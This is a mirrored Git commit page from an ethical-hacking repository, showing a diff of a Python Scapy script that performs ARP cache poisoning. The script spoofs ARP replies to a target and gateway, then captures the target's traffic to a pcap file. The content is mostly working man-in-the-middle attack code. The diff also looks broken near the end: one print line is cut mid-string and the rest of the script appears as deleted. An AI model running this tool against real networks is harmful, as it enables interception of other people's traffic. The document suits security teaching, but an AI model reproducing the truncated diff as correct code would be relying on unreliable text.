mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-23 21:25:25 +00:00
Merge pull request #126 from The-Art-of-Hacking/santosomar-patch-4
Update arp_cache_poisoner.py
This commit is contained in:
commit
8928a6f4aa
@ -1,6 +1,6 @@
|
|||||||
#!/usr/bin/env python3
|
#!/usr/bin/env python3
|
||||||
# ARP Cache Poisoning Attack using SCAPY
|
# ARP Cache Poisoning Attack using SCAPY
|
||||||
# Version: 0.2
|
# Version: 0.3
|
||||||
# Author: Omar Santos @santosomar
|
# Author: Omar Santos @santosomar
|
||||||
# This script performs an ARP cache poisoning attack using the SCAPY library.
|
# This script performs an ARP cache poisoning attack using the SCAPY library.
|
||||||
# It spoofs ARP replies to the target and gateway, causing them to update their ARP tables with the attacker's MAC address.
|
# It spoofs ARP replies to the target and gateway, causing them to update their ARP tables with the attacker's MAC address.
|
||||||
@ -22,13 +22,27 @@ conf.verb = 0
|
|||||||
|
|
||||||
# Get the MAC address of the given IP address.
|
# Get the MAC address of the given IP address.
|
||||||
def get_mac(ip_address):
|
def get_mac(ip_address):
|
||||||
|
"""
|
||||||
|
Retrieves the MAC address corresponding to the given IP address using ARP.
|
||||||
|
|
||||||
|
:param ip_address: IP address for which to retrieve the MAC address.
|
||||||
|
:return: MAC address if found, None otherwise.
|
||||||
|
"""
|
||||||
resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
|
resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
|
||||||
for s,r in resp:
|
for s, r in resp:
|
||||||
return r[ARP].hwsrc
|
return r[ARP].hwsrc
|
||||||
return None
|
return None
|
||||||
|
|
||||||
# Restore the network by reversing the ARP poison attack.
|
# Restore the network by reversing the ARP poison attack.
|
||||||
def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
|
def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
|
||||||
|
"""
|
||||||
|
Restores the network by sending ARP packets to correct the IP-MAC mappings.
|
||||||
|
|
||||||
|
:param gateway_ip: IP address of the gateway.
|
||||||
|
:param gateway_mac: MAC address of the gateway.
|
||||||
|
:param target_ip: IP address of the target device.
|
||||||
|
:param target_mac: MAC address of the target device.
|
||||||
|
"""
|
||||||
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
|
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
|
||||||
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
|
send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
|
||||||
print("[*] Disabling IP forwarding")
|
print("[*] Disabling IP forwarding")
|
||||||
@ -37,6 +51,14 @@ def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
|
|||||||
|
|
||||||
# Perform the ARP poisoning attack.
|
# Perform the ARP poisoning attack.
|
||||||
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
|
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
|
||||||
|
"""
|
||||||
|
Performs the ARP poisoning attack by sending crafted ARP packets.
|
||||||
|
|
||||||
|
:param gateway_ip: IP address of the gateway.
|
||||||
|
:param gateway_mac: MAC address of the gateway.
|
||||||
|
:param target_ip: IP address of the target device.
|
||||||
|
:param target_mac: MAC address of the target device.
|
||||||
|
"""
|
||||||
print("[*] Started ARP poison attack [CTRL-C to stop]")
|
print("[*] Started ARP poison attack [CTRL-C to stop]")
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
@ -60,35 +82,4 @@ if gateway_mac is None:
|
|||||||
print("[!] Unable to get gateway MAC address. Exiting..")
|
print("[!] Unable to get gateway MAC address. Exiting..")
|
||||||
sys.exit(0)
|
sys.exit(0)
|
||||||
else:
|
else:
|
||||||
print(f"[*] Gateway MAC address: {gateway_mac}")
|
print(f"[*
|
||||||
|
|
||||||
target_mac = get_mac(target_ip)
|
|
||||||
if target_mac is None:
|
|
||||||
print("[!] Unable to get target MAC address. Exiting..")
|
|
||||||
sys.exit(0)
|
|
||||||
else:
|
|
||||||
print(f"[*] Target MAC address: {target_mac}")
|
|
||||||
|
|
||||||
# Start the ARP poison thread
|
|
||||||
poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
|
|
||||||
poison_thread.start()
|
|
||||||
|
|
||||||
# Collect packet captures and save them to a file
|
|
||||||
try:
|
|
||||||
sniff_filter = "ip host " + target_ip
|
|
||||||
print(f"[*] Starting network capture. Packet Count: {packet_count}. Filter: {sniff_filter}")
|
|
||||||
packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count)
|
|
||||||
|
|
||||||
# Save captured packets to a .pcap file
|
|
||||||
wrpcap(target_ip + "_capture.pcap", packets)
|
|
||||||
|
|
||||||
print(f"[*] Stopping network capture..Restoring network")
|
|
||||||
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
|
|
||||||
|
|
||||||
# Gracefully handle KeyboardInterrupt (Ctrl+C) to stop packet capture and restore the network
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
print(f"[*] Stopping network capture..Restoring network")
|
|
||||||
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
|
|
||||||
sys.exit(0)
|
|
||||||
|
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user